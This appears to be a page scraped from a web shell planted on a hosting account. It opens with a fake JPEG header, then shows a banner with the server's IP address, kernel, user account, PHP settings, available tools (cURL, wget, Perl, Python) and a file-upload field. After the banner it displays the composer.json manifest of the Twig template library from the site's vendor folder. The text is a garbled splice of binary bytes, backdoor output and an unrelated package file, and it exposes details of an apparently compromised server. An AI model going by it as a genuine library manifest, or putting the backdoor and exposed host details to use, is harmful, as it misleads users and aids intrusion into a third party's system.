����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.14.251.36 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/ideyshare.name.ng/app/libraries/vendor/twig/twig/ |
Upload File : |
{ "name": "twig/twig", "type": "library", "description": "Twig, the flexible, fast, and secure template language for PHP", "keywords": ["templating"], "homepage": "https://twig.symfony.com", "license": "BSD-3-Clause", "minimum-stability": "dev", "authors": [ { "name": "Fabien Potencier", "email": "fabien@symfony.com", "homepage": "http://fabien.potencier.org", "role": "Lead Developer" }, { "name": "Twig Team", "role": "Contributors" }, { "name": "Armin Ronacher", "email": "armin.ronacher@active-4.com", "role": "Project Founder" } ], "require": { "php": ">=7.1.3", "symfony/polyfill-mbstring": "^1.3", "symfony/polyfill-ctype": "^1.8", "symfony/polyfill-php72": "^1.8" }, "require-dev": { "symfony/phpunit-bridge": "^4.4.9|^5.0.9|^6.0", "psr/container": "^1.0" }, "autoload": { "psr-0" : { "Twig_" : "lib/" }, "psr-4" : { "Twig\\" : "src/" } }, "autoload-dev": { "psr-4" : { "Twig\\Tests\\" : "tests/" } }, "extra": { "branch-alias": { "dev-master": "2.15-dev" } } }